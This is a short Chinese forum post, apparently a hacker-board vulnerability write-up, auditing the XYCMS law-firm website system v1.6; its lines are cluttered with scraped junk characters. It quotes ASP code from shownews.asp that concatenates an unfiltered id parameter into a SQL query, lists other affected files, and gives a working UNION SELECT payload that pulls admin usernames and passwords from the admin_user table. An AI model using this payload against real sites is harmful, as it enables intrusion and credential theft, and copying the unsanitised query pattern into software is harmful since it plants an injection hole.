前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似) n2 P7 _6 Q# N k6 H6 M, E
" N' f& q) t6 ]
淫荡分割线: ]6 U: c, h1 U* |' T
--------------------------------------------------------! t5 s1 i3 O# J- A" P; Y
4 L' V. B, R+ l. \- g: X# e- I审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
. [3 K! m3 q% M, ]& V8 A源码地址:http://down.chinaz.com/soft/29233.htm. {$ g6 \: B) s" b, g" f7 e5 b4 I
3 j% {5 c' v. o' K" k! {" Y4 _漏洞文件:shownews.asp
' [5 M; O4 f r1 _3 r漏洞代码:7-13行8 d, L! F3 R% M1 w; k( y! y9 ?
5 d$ A' q; F8 u& g: U( ? 7 g- a M/ A) w4 J, F
<% ; e7 R) ^8 p& H3 a# D# d6 X
id=request.QueryString("id"): p! k$ [& C. a- V1 `, p! n
4 {4 u5 m1 B" S4 ?$ ]set snews=server.createobject("adodb.recordset") $ t1 g7 P2 L3 G' O( K( Y6 L
exec="select * from [news] where id="&id1 }) f! y! x. a7 |. y
snews.open exec,conn,1,1" m% E' O2 i3 @3 X2 ~
%>
% f- k9 Z1 @, `* L) q$ E 6 }, k& W; `2 w7 m5 A$ g
. x( M2 E! e2 ^& d. U2 @3 ]3 a
什么过滤都没有 直造成注入
4 }( L; |4 F: _ ' n) z* F0 R* v! `. R
注入点:http://127.0.0.1:99/shownews.asp?id=xx
- y. E8 x. d( N
5 K& w4 x& j; O+ T3 w. M7 R其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
" Y% }& t. Q" w3 W% t
3 t6 T+ `7 E, e% i6 L 4 C# F' |) p- m6 @1 I9 @. A5 C% v
exp: union select 1,admin,password,4,5,7 from admin_user7 p9 E" {( x, s0 K; Y
% k* O/ o2 i2 x/ f' ~9 U
|